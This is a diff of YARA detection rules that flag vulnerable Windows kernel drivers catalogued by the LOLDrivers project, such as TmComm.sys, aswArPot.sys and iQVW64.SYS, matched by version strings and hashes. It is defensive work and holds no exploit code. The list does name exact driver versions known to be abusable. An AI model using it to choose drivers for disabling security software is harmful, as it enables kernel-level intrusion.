-		$ = { 004f0072006900670069006e0061006c00460069006c0065006e0061006d0065[1-8]00560042006f0078004400720076002e007300790073 }
-		$ = { 004c006500670061006c0043006f0070007900720069006700680074[1-8]0043006f0070007900720069006700680074002000280043002900200032003000300039002d00320030003100380020004f007200610063006c006500200043006f00720070006f0072006100740069006f006e }
+		$ = { 00460069006c0065004400650073006300720069007000740069006f006e[1-8]005400720065006e0064004d006900630072006f00200043006f006d006d006f006e0020004d006f00640075006c0065 }
+		$ = { 0043006f006d00700061006e0079004e0061006d0065[1-8]005400720065006e00640020004d006900630072006f00200049006e0063002e }
+		$ = { 00460069006c006500560065007200730069006f006e[1-8]0036002e00320030002e0030002e0031003000300038 }
+		$ = { 00500072006f006400750063007400560065007200730069006f006e[1-8]0036002e00320030 }
+		$ = { 0049006e007400650072006e0061006c004e0061006d0065[1-8]0054006d0043006f006d006d002e007300790073 }
+		$ = { 00500072006f0064007500630074004e0061006d0065[1-8]005400720065006e00640020004d006900630072006f00200045007900650073 }
+		$ = { 004f0072006900670069006e0061006c00460069006c0065006e0061006d0065[1-8]0054006d0043006f006d006d002e007300790073 }
+		$ = { 004c006500670061006c0043006f0070007900720069006700680074[1-8]0043006f00700079007200690067006800740020002800430029002000320030003100330020005400720065006e00640020004d006900630072006f00200049006e0063006f00720070006f00720061007400650064002e00200041006c006c0020007200690067006800740073002000720065007300650072007600650064002e }
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 400KB and all of them
+		uint16( 0 ) == 0x5a4d and filesize < 300KB and all of them
 }
-rule LOLDRIVERS_PUA_VULN_Driver_Trendmicroinc_Tmcommsys_Trendmicroeyes_3C42 : FILE
+rule LOLDRIVERS_PUA_VULN_Driver_Paragonsoftwaregmbh_Biontdrv_Paragonsystemutilities_174C : FILE
 {
 	meta:
-		description = "Detects vulnerable driver mentioned in LOLDrivers project using VersionInfo values from the PE header - TmComm.sys"
+		description = "Detects vulnerable driver mentioned in LOLDrivers project using VersionInfo values from the PE header - BioNTdrv.sys"
 		author = "Florian Roth"
-		id = "e4c649d8-941e-57d8-9193-a7e5c3de4671"
+		id = "e9f2040c-7222-5513-b8c5-9917beb2cf58"
 		date = "2025-03-07"
 		modified = "2025-03-07"
 		reference = "https://github.com/magicsword-io/LOLDrivers"
-		source_url = "https://github.com/magicsword-io/LOLDrivers//blob/e2e48f15a0885e8b2ad2fb81255089845f5c183c/detections/yara/yara-rules_vuln_drivers_strict.yar#L10959-L10978"
+		source_url = "https://github.com/magicsword-io/LOLDrivers//blob/e2e48f15a0885e8b2ad2fb81255089845f5c183c/detections/yara/yara-rules_vuln_drivers_strict.yar#L11701-L11719"
 		license_url = "https://github.com/magicsword-io/LOLDrivers//blob/e2e48f15a0885e8b2ad2fb81255089845f5c183c/LICENSE"
-		hash = "3c4207c90c97733fae2a08679d63fbbe94dfcf96fdfdf88406aa7ab3f80ea78f"
-		logic_hash = "b3e67939d8f6e6121c3d36dfe5ccb01c9cd2a2d5488053a9834c7cb147ac250e"
+		hash = "174c8d771d31d70fc95448e961a395f5ceb7658f0cc381a718fb3b854cde4efe"
+		logic_hash = "7476011ce35a732c1bd404636bacf63503e88e0463729041aa11221b92cc8d97"
 		score = 40
 		quality = 80
 		tags = "FILE"
 
 	strings:
-		$ = { 00460069006c0065004400650073006300720069007000740069006f006e[1-8]005400720065006e0064004d006900630072006f00200043006f006d006d006f006e0020004d006f00640075006c0065 }
-		$ = { 0043006f006d00700061006e0079004e0061006d0065[1-8]005400720065006e00640020004d006900630072006f00200049006e0063002e }
-		$ = { 00460069006c006500560065007200730069006f006e[1-8]0036002e00370030002e0030002e0031003100320038 }
-		$ = { 00500072006f006400750063007400560065007200730069006f006e[1-8]0036002e00370030 }
-		$ = { 0049006e007400650072006e0061006c004e0061006d0065[1-8]0054006d0043006f006d006d002e007300790073 }
-		$ = { 00500072006f0064007500630074004e0061006d0065[1-8]005400720065006e00640020004d006900630072006f00200045007900650073 }
-		$ = { 004f0072006900670069006e0061006c00460069006c0065006e0061006d0065[1-8]0054006d0043006f006d006d002e007300790073 }
-		$ = { 004c006500670061006c0043006f0070007900720069006700680074[1-8]0043006f0070007900720069006700680074002000200028004300290020002000320030003200300020005400720065006e00640020004d006900630072006f00200049006e0063006f00720070006f00720061007400650064002e00200041006c006c0020007200690067006800740073002000720065007300650072007600650064002e }
+		$ = { 00460069006c0065004400650073006300720069007000740069006f006e[1-8]0041002000700061007200740020006f0066002000500061007200610067006f006e002000530079007300740065006d0020005500740069006c00690074006900650073 }
+		$ = { 0043006f006d00700061006e0079004e0061006d0065[1-8]00500061007200610067006f006e00200053006f00660074007700610072006500200047006d00620048 }
+		$ = { 00500072006f006400750063007400560065007200730069006f006e[1-8]0031002e0035002e0031 }
+		$ = { 0049006e007400650072006e0061006c004e0061006d0065[1-8]00620069006f006e0074006400720076 }
+		$ = { 00500072006f0064007500630074004e0061006d0065[1-8]00500061007200610067006f006e002000530079007300740065006d0020005500740069006c00690074006900650073 }
+		$ = { 004f0072006900670069006e0061006c00460069006c0065006e0061006d0065[1-8]00620069006f006e0074006400720076002e007300790073 }
+		$ = { 004c006500670061006c0043006f0070007900720069006700680074[1-8]0043006f007000790072006900670068007400200031003900390034002d0032003000320032002000500061007200610067006f006e00200053006f00660074007700610072006500200047006d00620048 }
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 400KB and all of them
+		uint16( 0 ) == 0x5a4d and filesize < 100KB and all of them
 }
-rule LOLDRIVERS_PUA_VULN_Driver_Asustekcomputerinc_Atsziosys_Atsziodriver_55A1 : FILE
+rule LOLDRIVERS_PUA_VULN_Driver_Elaboratebytesag_Elbycdio_Cdrtools_5148 : FILE
 {
 	meta:
-		description = "Detects vulnerable driver mentioned in LOLDrivers project using VersionInfo values from the PE header - ATSZIO.sys"
+		description = "Detects vulnerable driver mentioned in LOLDrivers project using VersionInfo values from the PE header - elbycdio.sys"
 		author = "Florian Roth"
-		id = "3bd64a09-bfa9-5b87-8048-60e61c1a61f7"
+		id = "8685ea34-689e-5b00-8aeb-8f15dd7b3f25"
 		date = "2025-03-07"
 		modified = "2025-03-07"
 		reference = "https://github.com/magicsword-io/LOLDrivers"
-		source_url = "https://github.com/magicsword-io/LOLDrivers//blob/e2e48f15a0885e8b2ad2fb81255089845f5c183c/detections/yara/yara-rules_vuln_drivers_strict.yar#L10981-L11001"
+		source_url = "https://github.com/magicsword-io/LOLDrivers//blob/e2e48f15a0885e8b2ad2fb81255089845f5c183c/detections/yara/yara-rules_vuln_drivers_strict.yar#L11722-L11741"
 		license_url = "https://github.com/magicsword-io/LOLDrivers//blob/e2e48f15a0885e8b2ad2fb81255089845f5c183c/LICENSE"
-		hash = "55a1535e173c998fbbc978009b02d36ca0c737340d84ac2a8da73dfc2f450ef9"
-		hash = "c64d4ac416363c7a1aa828929544d1c1d78cf032b39769943b851cfc4c0faafc"
-		logic_hash = "a6c5fd6c88e08f663479840ae853a0dd22427d0059f0c6aa961dcc1a395dacce"
+		hash = "51480eebbbfb684149842c3e19a8ffbd3f71183c017e0c4bc6cf06aacf9c0292"
+		logic_hash = "b36414a71e9bd69512ef0c702bf4f7b4bfdb812326a67a0e50f6f75f5c89c152"
 		score = 40
 		quality = 80
 		tags = "FILE"
 
 	strings:
-		$ = { 00460069006c0065004400650073006300720069007000740069006f006e[1-8]004100540053005a0049004f0020004400720069007600650072 }
-		$ = { 0043006f006d00700061006e0079004e0061006d0065[1-8]004100530055005300540065006b00200043006f006d0070007500740065007200200049006e0063002e }
-		$ = { 00460069006c006500560065007200730069006f006e[1-8]0030002e0032002e0031002e0036 }
-		$ = { 00500072006f006400750063007400560065007200730069006f006e[1-8]0030002e0032002e0031002e0036 }
-		$ = { 0049006e007400650072006e0061006c004e0061006d0065[1-8]004100540053005a0049004f002e007300790073 }
-		$ = { 00500072006f0064007500630074004e0061006d0065[1-8]004100540053005a0049004f0020004400720069007600650072 }
-		$ = { 004f0072006900670069006e0061006c00460069006c0065006e0061006d0065[1-8]004100540053005a0049004f002e007300790073 }
-		$ = { 004c006500670061006c0043006f0070007900720069006700680074[1-8]0043006f0070007900720069006700680074002000280043002900200032003000310032 }
+		$ = { 00460069006c0065004400650073006300720069007000740069006f006e[1-8]0045006c0062007900430044002000570069006e0064006f007700730020004e0054002f0032003000300030002f0058005000200049002f004f0020006400720069007600650072 }
+		$ = { 0043006f006d00700061006e0079004e0061006d0065[1-8]0045006c00610062006f0072006100740065002000420079007400650073002000410047 }
+		$ = { 00460069006c006500560065007200730069006f006e[1-8]0034002c00200033002c00200030002c00200033 }
+		$ = { 00500072006f006400750063007400560065007200730069006f006e[1-8]0034002c00200033002c00200030002c00200030 }
+		$ = { 0049006e007400650072006e0061006c004e0061006d0065[1-8]0045006c00620079004300440049004f }
+		$ = { 00500072006f0064007500630074004e0061006d0065[1-8]0043004400520054006f006f006c0073 }
+		$ = { 004f0072006900670069006e0061006c00460069006c0065006e0061006d0065[1-8]0045006c00620079004300440049004f002e007300790073 }
+		$ = { 004c006500670061006c0043006f0070007900720069006700680074[1-8]0043006f00700079007200690067006800740020002800430029002000320030003000300020002d0020003200300030003300200045006c00610062006f0072006100740065002000420079007400650073002000410047 }
 
 	condition:
 		uint16( 0 ) == 0x5a4d and filesize < 100KB and all of them
 }
-rule LOLDRIVERS_PUA_VULN_Driver_Windowsrwinddkprovider_Sbiosiosys_Samsungrbiosiodriver_B3D1 : FILE
+rule LOLDRIVERS_PUA_VULN_Driver_Biostargroup_Iodriver_Biostariodriver_1D03 : FILE
 {
 	meta:
-		description = "Detects vulnerable driver mentioned in LOLDrivers project using VersionInfo values from the PE header - SBIOSIO64.sys"
+		description = "Detects vulnerable driver mentioned in LOLDrivers project using VersionInfo values from the PE header - BS_HWMIO64_W10.sys"
 		author = "Florian Roth"
-		id = "d2eed5da-ca7c-5ae3-ab44-2a49f43ec409"
+		id = "ea157129-3347-5ba0-a115-928b4aef345f"
 		date = "2025-03-07"
 		modified = "2025-03-07"
 		reference = "https://github.com/magicsword-io/LOLDrivers"
-		source_url = "https://github.com/magicsword-io/LOLDrivers//blob/e2e48f15a0885e8b2ad2fb81255089845f5c183c/detections/yara/yara-rules_vuln_drivers_strict.yar#L11004-L11024"
+		source_url = "https://github.com/magicsword-io/LOLDrivers//blob/e2e48f15a0885e8b2ad2fb81255089845f5c183c/detections/yara/yara-rules_vuln_drivers_strict.yar#L11744-L11763"
 		license_url = "https://github.com/magicsword-io/LOLDrivers//blob/e2e48f15a0885e8b2ad2fb81255089845f5c183c/LICENSE"
-		hash = "b3d1bdd4ad819b99870b6e2ed3527dfc0e3ce27b929ad64382b9c3d4e332315c"
-		hash = "442d506c1ac1f48f6224f0cdd64590779aee9c88bdda2f2cc3169b862cba1243"
-		logic_hash = "5bcc568a4f4edc03e51801c4b256b34ed7f7ae08b7e00ca3f4bd7559502e3c76"
+		hash = "1d0397c263d51e9fc95bcc8baf98d1a853e1c0401cd0e27c7bf5da3fba1c93a8"
+		logic_hash = "26e886b28b40a920558a652197a0d7a31fc5f7b239d3886fdf0f44da4590dabb"
 		score = 40
 		quality = 80
 		tags = "FILE"
 
 	strings:
-		$ = { 00460069006c0065004400650073006300720069007000740069006f006e[1-8]005300420049004f00530049004f0020004400720069007600650072 }
-		$ = { 0043006f006d00700061006e0079004e0061006d0065[1-8]00570069006e0064006f007700730020002800520029002000570069006e00200037002000440044004b002000700072006f00760069006400650072 }
-		$ = { 00460069006c006500560065007200730069006f006e[1-8]0031002e0031002e0030003000300030002e0030 }
-		$ = { 00500072006f006400750063007400560065007200730069006f006e[1-8]0031002e0031002e0030003000300030002e0030 }
-		$ = { 0049006e007400650072006e0061006c004e0061006d0065[1-8]005300420049004f00530049004f00360034002e007300790073 }
-		$ = { 00500072006f0064007500630074004e0061006d0065[1-8]00530061006d00730075006e00670020002800520029002000420049004f005300200049004f0020006400720069007600650072 }
-		$ = { 004f0072006900670069006e0061006c00460069006c0065006e0061006d0065[1-8]005300420049004f00530049004f00360034002e007300790073 }
-		$ = { 004c006500670061006c0043006f0070007900720069006700680074[1-8]0043006f00700079007200690067006800740020002800630029002000530061006d00730075006e006700200045006c0065006300740072006f006e006900630073002e00200041006c006c0020007200690067006800740073002000720065007300650072007600650064002e }
+		$ = { 00460069006c0065004400650073006300720069007000740069006f006e[1-8]0049002f004f00200049006e00740065007200660061006300650020006400720069007600650072002000660069006c0065 }
+		$ = { 0043006f006d00700061006e0079004e0061006d0065[1-8]00420049004f0053005400410052002000470072006f00750070 }
+		$ = { 00460069006c006500560065007200730069006f006e[1-8]00310030002c00200030002c00200031003800300036002c00200032003200300030 }
+		$ = { 00500072006f006400750063007400560065007200730069006f006e[1-8]00310030002c00200030002c00200031003800300036002c00200032003200300030 }
+		$ = { 0049006e007400650072006e0061006c004e0061006d0065[1-8]0049002f004f0020006400720069007600650072 }
+		$ = { 00500072006f0064007500630074004e0061006d0065[1-8]00420049004f005300540041005200200049002f004f0020006400720069007600650072 }
+		$ = { 004f0072006900670069006e0061006c00460069006c0065006e0061006d0065[1-8]00420053005f00480057004d0049004f00360034005f005700310030002e007300790073 }
+		$ = { 004c006500670061006c0043006f0070007900720069006700680074[1-8]0043006f0070007900720069006700680074002000280063002900200032003000310038002d0032003000310039002000420049004f0053005400410052002000470072006f00750070 }
 
 	condition:
 		uint16( 0 ) == 0x5a4d and filesize < 100KB and all of them
 }
-rule LOLDRIVERS_PUA_VULN_Driver_Sisoftware_Sandra_Sisoftwaresandra_1AAF : FILE
+rule LOLDRIVERS_PUA_VULN_Driver_Avgtechnologiesczsro_Aswarpotsys_Avginternetsecuritysystem_E2E7 : FILE
 {
 	meta:
-		description = "Detects vulnerable driver mentioned in LOLDrivers project using VersionInfo values from the PE header - sandra.sys"
+		description = "Detects vulnerable driver mentioned in LOLDrivers project using VersionInfo values from the PE header - aswArPot.sys, avgArPot.sys"
 		author = "Florian Roth"
-		id = "9fc423bb-451b-52e8-ba81-7113cd1621c8"
+		id = "ec02c434-7918-5212-85f6-5ee417940b7c"
 		date = "2025-03-07"
 		modified = "2025-03-07"
 		reference = "https://github.com/magicsword-io/LOLDrivers"
-		source_url = "https://github.com/magicsword-io/LOLDrivers//blob/e2e48f15a0885e8b2ad2fb81255089845f5c183c/detections/yara/yara-rules_vuln_drivers_strict.yar#L11027-L11046"
+		source_url = "https://github.com/magicsword-io/LOLDrivers//blob/e2e48f15a0885e8b2ad2fb81255089845f5c183c/detections/yara/yara-rules_vuln_drivers_strict.yar#L11766-L11785"
 		license_url = "https://github.com/magicsword-io/LOLDrivers//blob/e2e48f15a0885e8b2ad2fb81255089845f5c183c/LICENSE"
-		hash = "1aaf4c1e3cb6774857e2eef27c17e68dc1ae577112e4769665f516c2e8c4e27b"
-		logic_hash = "e441204be274ce4379526096008b545e2a53b11c26c270c2df0c1f70b98d1e57"
+		hash = "e2e79f1e696f27fa70d72f97e448081b1fa14d59cbb89bb4a40428534dd5c6f6"
+		logic_hash = "9f77c427b54f1a940547cfc206b8d1aed0288d0664a5a124785c7fcec7b90507"
 		score = 40
 		quality = 80
 		tags = "FILE"
 
 	strings:
-		$ = { 00460069006c0065004400650073006300720069007000740069006f006e[1-8]00530061006e006400720061002000440065007600690063006500200044007200690076006500720020002800570069006e003600340020007800360034002900280055006e00690063006f006400650029 }
-		$ = { 0043006f006d00700061006e0079004e0061006d0065[1-8]005300690053006f006600740077006100720065 }
-		$ = { 00460069006c006500560065007200730069006f006e[1-8]00310030002e00310031002e0031002e00310020006200750069006c0074002000620079003a002000570069006e00440044004b }
-		$ = { 00500072006f006400750063007400560065007200730069006f006e[1-8]00310030002e00310031002e0031002e0031 }
-		$ = { 0049006e007400650072006e0061006c004e0061006d0065[1-8]00530041004e004400520041 }
-		$ = { 00500072006f0064007500630074004e0061006d0065[1-8]005300690053006f006600740077006100720065002000530061006e006400720061 }
-		$ = { 004f0072006900670069006e0061006c00460069006c0065006e0061006d0065[1-8]00530041004e004400520041 }
-		$ = { 004c006500670061006c0043006f0070007900720069006700680074[1-8]0043006f0070007900720069006700680074002000a90020005300690053006f0066007400770061007200650020004c0074006400200031003900390035002d0032003000300038002e00200041006c006c0020007200690067006800740073002000720065007300650072007600650064002e }
+		$ = { 00460069006c0065004400650073006300720069007000740069006f006e[1-8]00410056004700200061006e0074006900200072006f006f0074006b00690074 }
+		$ = { 0043006f006d00700061006e0079004e0061006d0065[1-8]00410056004700200054006500630068006e006f006c006f006700690065007300200043005a002c00200073002e0072002e006f002e }
+		$ = { 00460069006c006500560065007200730069006f006e[1-8]00310039002e0034002e0034003200310031002e0030 }
+		$ = { 00500072006f006400750063007400560065007200730069006f006e[1-8]00310039002e0034002e0034003200310031002e0030 }
+		$ = { 0049006e007400650072006e0061006c004e0061006d0065[1-8]006100730077004100720050006f0074002e007300790073 }
+		$ = { 00500072006f0064007500630074004e0061006d0065[1-8]00410056004700200049006e007400650072006e00650074002000530065006300750072006900740079002000530079007300740065006d0020 }
+		$ = { 004f0072006900670069006e0061006c00460069006c0065006e0061006d0065[1-8]006100730077004100720050006f0074002e007300790073 }
+		$ = { 004c006500670061006c0043006f0070007900720069006700680074[1-8]0043006f0070007900720069006700680074002000280043002900200032003000310039002000410056004700200054006500630068006e006f006c006f006700690065007300200043005a002c00200073002e0072002e006f002e }
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 100KB and all of them
+		uint16( 0 ) == 0x5a4d and filesize < 300KB and all of them
 }
-rule LOLDRIVERS_PUA_VULN_Driver_Windowsrwinddkprovider_Dcprotectsys_Dcprotectrwinxdriver_1698 : FILE
+rule LOLDRIVERS_PUA_VULN_Driver_Windowsrwinddkprovider_Dcprotectsys_Dcprotectrwinxdriver_B224 : FILE
 {
 	meta:
 		description = "Detects vulnerable driver mentioned in LOLDrivers project using VersionInfo values from the PE header - DcProtect.sys"
 		author = "Florian Roth"
-		id = "4be3fa3a-dec2-5906-99b0-024c8ed059a5"
+		id = "d5d84ed9-f0c5-54a8-8a7d-0006c1c98f1d"
 		date = "2025-03-07"
 		modified = "2025-03-07"
 		reference = "https://github.com/magicsword-io/LOLDrivers"
-		source_url = "https://github.com/magicsword-io/LOLDrivers//blob/e2e48f15a0885e8b2ad2fb81255089845f5c183c/detections/yara/yara-rules_vuln_drivers_strict.yar#L11049-L11068"
+		source_url = "https://github.com/magicsword-io/LOLDrivers//blob/e2e48f15a0885e8b2ad2fb81255089845f5c183c/detections/yara/yara-rules_vuln_drivers_strict.yar#L11788-L11807"
 		license_url = "https://github.com/magicsword-io/LOLDrivers//blob/e2e48f15a0885e8b2ad2fb81255089845f5c183c/LICENSE"
-		hash = "1698ba7eeee6ff9272cc25b242af89190ff23fd9530f21aa8f0f3792412594f3"
-		logic_hash = "be362e0f19f3565a77b1dbd78ea04f85b7f56fd6889d8fa48ed9ded25134bc2e"
+		hash = "b2247e68386c1bdfd48687105c3728ebbad672daffa91b57845b4e49693ffd71"
+		logic_hash = "e1d35eb3ea6012cf8b742e97f08d797b4fd64bcc72bd7ebccb8ca33f11afad67"
 		score = 40
 		quality = 80
 		tags = "FILE"
@@ -225426,145 +225755,146 @@ rule LOLDRIVERS_PUA_VULN_Driver_Windowsrwinddkprovider_Dcprotectsys_Dcprotectrwi
 		$ = { 00460069006c006500560065007200730069006f006e[1-8]0031002e0032002e0030002e0030 }
 		$ = { 00500072006f006400750063007400560065007200730069006f006e[1-8]0031002e0032002e0030002e0030 }
 		$ = { 0049006e007400650072006e0061006c004e0061006d0065[1-8]0044006300500072006f0074006500630074002e007300790073 }
-		$ = { 00500072006f0064007500630074004e0061006d0065[1-8]0044006300500072006f00740065006300740020002800520029002000570069006e003700780036003400200064007200690076006500720020 }
+		$ = { 00500072006f0064007500630074004e0061006d0065[1-8]0044006300500072006f00740065006300740020002800520029002000570069006e0031003000780036003400200064007200690076006500720020 }
 		$ = { 004f0072006900670069006e0061006c00460069006c0065006e0061006d0065[1-8]0044006300500072006f0074006500630074002e007300790073 }
 		$ = { 004c006500670061006c0043006f0070007900720069006700680074[1-8]0043006f0070007900720069006700680074002000280043002900200032003000310032002d00320030003200300020004a00690061006e0067006d0065006e0020004500790075006e0020004e006500740077006f0072006b00200043006f002e002c004c00740064002e00200032003000310039 }
 
 	condition:
 		uint16( 0 ) == 0x5a4d and filesize < 100KB and all of them
 }
-rule LOLDRIVERS_PUA_VULN_Driver_Trendmicroinc_Tmcommsys_Aegis_C901 : FILE
+rule LOLDRIVERS_PUA_VULN_Driver_Intelcorporation_Iqvwsys_Intelriqvwsys_5F69 : FILE
 {
 	meta:
-		description = "Detects vulnerable driver mentioned in LOLDrivers project using VersionInfo values from the PE header - TmComm.sys"
+		description = "Detects vulnerable driver mentioned in LOLDrivers project using VersionInfo values from the PE header - iQVW64.SYS"
 		author = "Florian Roth"
-		id = "a1c33a78-bef9-59fc-8976-876c1fe68aff"
+		id = "04fdd9f7-605b-54ee-849d-44a50ef732d2"
 		date = "2025-03-07"
 		modified = "2025-03-07"
 		reference = "https://github.com/magicsword-io/LOLDrivers"
-		source_url = "https://github.com/magicsword-io/LOLDrivers//blob/e2e48f15a0885e8b2ad2fb81255089845f5c183c/detections/yara/yara-rules_vuln_drivers_strict.yar#L11071-L11090"
+		source_url = "https://github.com/magicsword-io/LOLDrivers//blob/e2e48f15a0885e8b2ad2fb81255089845f5c183c/detections/yara/yara-rules_vuln_drivers_strict.yar#L11810-L11829"
 		license_url = "https://github.com/magicsword-io/LOLDrivers//blob/e2e48f15a0885e8b2ad2fb81255089845f5c183c/LICENSE"
-		hash = "c9014b03866bf37faa8fdb16b6af7cfec976aaef179fd5797d0c0bf8079d3a8c"
-		logic_hash = "2320a0cc02aa28c6495f553b2c7c9c0486599e510d8378dfb3f15b988ff90983"
+		hash = "5f69d6b167a1eeca3f6ac64785c3c01976ee7303171faf998d65852056988683"
+		logic_hash = "0242a0398f90468dfc41eb04570a70d5072fe089b270feb1f5ab7fbd2c7a1ffc"
 		score = 40
 		quality = 80
 		tags = "FILE"
 
 	strings:
-		$ = { 00460069006c0065004400650073006300720069007000740069006f006e[1-8]005400720065006e0064004d006900630072006f00200043006f006d006d006f006e0020004d006f00640075006c0065 }
-		$ = { 0043006f006d00700061006e0079004e0061006d0065[1-8]005400720065006e00640020004d006900630072006f00200049006e0063002e }
-		$ = { 00460069006c006500560065007200730069006f006e[1-8]0032002e0030002e0030002e0031003100310038 }
-		$ = { 00500072006f006400750063007400560065007200730069006f006e[1-8]0032002e0030 }
-		$ = { 0049006e007400650072006e0061006c004e0061006d0065[1-8]0054006d0043006f006d006d002e007300790073 }
-		$ = { 00500072006f0064007500630074004e0061006d0065[1-8]00410045004700490053 }
-		$ = { 004f0072006900670069006e0061006c00460069006c0065006e0061006d0065[1-8]0054006d0043006f006d006d002e007300790073 }
-		$ = { 004c006500670061006c0043006f0070007900720069006700680074[1-8]0043006f0070007900720069006700680074002000280043002900200032003000300035002d00320030003000370020005400720065006e00640020004d006900630072006f00200049006e0063006f00720070006f00720061007400650064002e00200041006c006c0020007200690067006800740073002000720065007300650072007600650064002e }
+		$ = { 00460069006c0065004400650073006300720069007000740069006f006e[1-8]0049006e00740065006c0028005200290020004e006500740077006f0072006b0020004100640061007000740065007200200044006900610067006e006f00730074006900630020004400720069007600650072 }
+		$ = { 0043006f006d00700061006e0079004e0061006d0065[1-8]0049006e00740065006c00200043006f00720070006f0072006100740069006f006e0020 }
+		$ = { 00460069006c006500560065007200730069006f006e[1-8]0031002e00300033002e0032002e00370020006200750069006c0074002000620079003a002000570069006e00440044004b }
+		$ = { 00500072006f006400750063007400560065007200730069006f006e[1-8]0031002e00300033002e0032002e0037 }
+		$ = { 0049006e007400650072006e0061006c004e0061006d0065[1-8]006900510056005700360034002e005300590053 }
+		$ = { 00500072006f0064007500630074004e0061006d0065[1-8]0049006e00740065006c0028005200290020006900510056005700360034002e005300590053 }
+		$ = { 004f0072006900670069006e0061006c00460069006c0065006e0061006d0065[1-8]006900510056005700360034002e005300590053 }
+		$ = { 004c006500670061006c0043006f0070007900720069006700680074[1-8]0043006f0070007900720069006700680074002000280043002900200032003000300032002d003200300031003600200049006e00740065006c00200043006f00720070006f0072006100740069006f006e00200041006c006c0020005200690067006800740073002000520065007300650072007600650064002e }
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 200KB and all of them
+		uint16( 0 ) == 0x5a4d and filesize < 100KB and all of them
 }
-rule LOLDRIVERS_PUA_VULN_Driver_Symanteccorporation_Vproeventmonitorsys_Symanteceventmonitorsdriverdevelopmentedition_7877 : FILE
+rule LOLDRIVERS_PUA_VULN_Driver_Avastsoftware_Ngiodriversys_Avastng_5E3B : FILE
 {
 	meta:
-		description = "Detects vulnerable driver mentioned in LOLDrivers project using VersionInfo values from the PE header - VProEventMonitor.sys"
+		description = "Detects vulnerable driver mentioned in LOLDrivers project using VersionInfo values from the PE header - ngiodriver.sys"
 		author = "Florian Roth"
-		id = "84fa4df8-ac81-5de0-994d-9d754642a01e"
+		id = "f454f9bf-3dd3-5bb1-a5b5-c00f5356bd25"
 		date = "2025-03-07"
 		modified = "2025-03-07"
 		reference = "https://github.com/magicsword-io/LOLDrivers"
-		source_url = "https://github.com/magicsword-io/LOLDrivers//blob/e2e48f15a0885e8b2ad2fb81255089845f5c183c/detections/yara/yara-rules_vuln_drivers_strict.yar#L11093-L11112"
+		source_url = "https://github.com/magicsword-io/LOLDrivers//blob/e2e48f15a0885e8b2ad2fb81255089845f5c183c/detections/yara/yara-rules_vuln_drivers_strict.yar#L11832-L11851"
 		license_url = "https://github.com/magicsword-io/LOLDrivers//blob/e2e48f15a0885e8b2ad2fb81255089845f5c183c/LICENSE"
-		hash = "7877c1b0e7429453b750218ca491c2825dae684ad9616642eff7b41715c70aca"
-		logic_hash = "693ace66d01afcdd61fe23a3baa8b950153d38bdc386a43861005654c269cd3d"
+		hash = "5e3bc2d7bc56971457d642458563435c7e5c9c3c7c079ef5abeb6a61fb4d52ea"
+		logic_hash = "893fe9de3a164fd33483d139e76db4c213c402f276bd285c9acefd76da1d2f38"
 		score = 40
 		quality = 80
 		tags = "FILE"
 
 	strings:
-		$ = { 00460069006c0065004400650073006300720069007000740069006f006e[1-8]005600500072006f004500760065006e0074004d006f006e00690074006f0072002e0053007900730020002d0020004500760065006e00740020004d006f006e00690074006f00720069006e00670020006400720069007600650072 }
-		$ = { 0043006f006d00700061006e0079004e0061006d0065[1-8]00530079006d0061006e00740065006300200043006f00720070006f0072006100740069006f006e }
-		$ = { 00460069006c006500560065007200730069006f006e[1-8]0031002e0030002e0030002e00340035003700300038 }
-		$ = { 00500072006f006400750063007400560065007200730069006f006e[1-8]0031002e0030002e0030 }
-		$ = { 0049006e007400650072006e0061006c004e0061006d0065[1-8]005600500072006f004500760065006e0074004d006f006e00690074006f0072002e005300790073 }
-		$ = { 00500072006f0064007500630074004e0061006d0065[1-8]00530079006d0061006e0074006500630020004500760065006e00740020004d006f006e00690074006f00720073002000440072006900760065007200200044006500760065006c006f0070006d0065006e0074002000450064006900740069006f006e }
-		$ = { 004f0072006900670069006e0061006c00460069006c0065006e0061006d0065[1-8]005600500072006f004500760065006e0074004d006f006e00690074006f0072002e005300790073 }
-		$ = { 004c006500670061006c0043006f0070007900720069006700680074[1-8]0043006f0070007900720069006700680074002000a900200032003000300037002d0032003000300038002000530079006d0061006e00740065006300200043006f00720070006f0072006100740069006f006e002e00200041006c006c0020007200690067006800740073002000720065007300650072007600650064002e }
+		$ = { 00460069006c0065004400650073006300720069007000740069006f006e[1-8]0061007600610073007400210020004e0047002000730065007400750070002000680065006c0070006500720020006400720069007600650072 }
+		$ = { 0043006f006d00700061006e0079004e0061006d0065[1-8]0041005600410053005400200053006f006600740077006100720065 }
+		$ = { 00460069006c006500560065007200730069006f006e[1-8]00310030002e0030002e0030002e00330033 }
+		$ = { 00500072006f006400750063007400560065007200730069006f006e[1-8]00310030002e0030002e0030002e00330033 }
+		$ = { 0049006e007400650072006e0061006c004e0061006d0065[1-8]006e00670069006f006400720069007600650072002e007300790073 }
+		$ = { 00500072006f0064007500630074004e0061006d0065[1-8]004100760061007300740020004e0047 }
+		$ = { 004f0072006900670069006e0061006c00460069006c0065006e0061006d0065[1-8]006e00670069006f006400720069007600650072002e007300790073 }
+		$ = { 004c006500670061006c0043006f0070007900720069006700680074[1-8]0043006f007000790072006900670068007400200028006300290020003200300031003400200041005600410053005400200053006f006600740077006100720065 }
 
 	condition:
 		uint16( 0 ) == 0x5a4d and filesize < 100KB and all of them
 }
-rule LOLDRIVERS_PUA_VULN_Driver_Wj_Kprocesshacker_C725 : FILE
+rule LOLDRIVERS_PUA_VULN_Driver_Windowsrwinddkprovider_Dcprotectsys_Dcprotectrwinxdriver_9DEE : FILE
 {
 	meta:
-		description = "Detects vulnerable driver mentioned in LOLDrivers project using VersionInfo values from the PE header - kprocesshacker.sys"
+		description = "Detects vulnerable driver mentioned in LOLDrivers project using VersionInfo values from the PE header - DcProtect.sys"
 		author = "Florian Roth"
-		id = "53a8740a-65a5-5eb5-afc5-b86058982071"
+		id = "38c59d28-a35d-57f5-ad0e-7822e3381b53"
 		date = "2025-03-07"
 		modified = "2025-03-07"
 		reference = "https://github.com/magicsword-io/LOLDrivers"
-		source_url = "https://github.com/magicsword-io/LOLDrivers//blob/e2e48f15a0885e8b2ad2fb81255089845f5c183c/detections/yara/yara-rules_vuln_drivers_strict.yar#L11115-L11133"
+		source_url = "https://github.com/magicsword-io/LOLDrivers//blob/e2e48f15a0885e8b2ad2fb81255089845f5c183c/detections/yara/yara-rules_vuln_drivers_strict.yar#L11854-L11873"
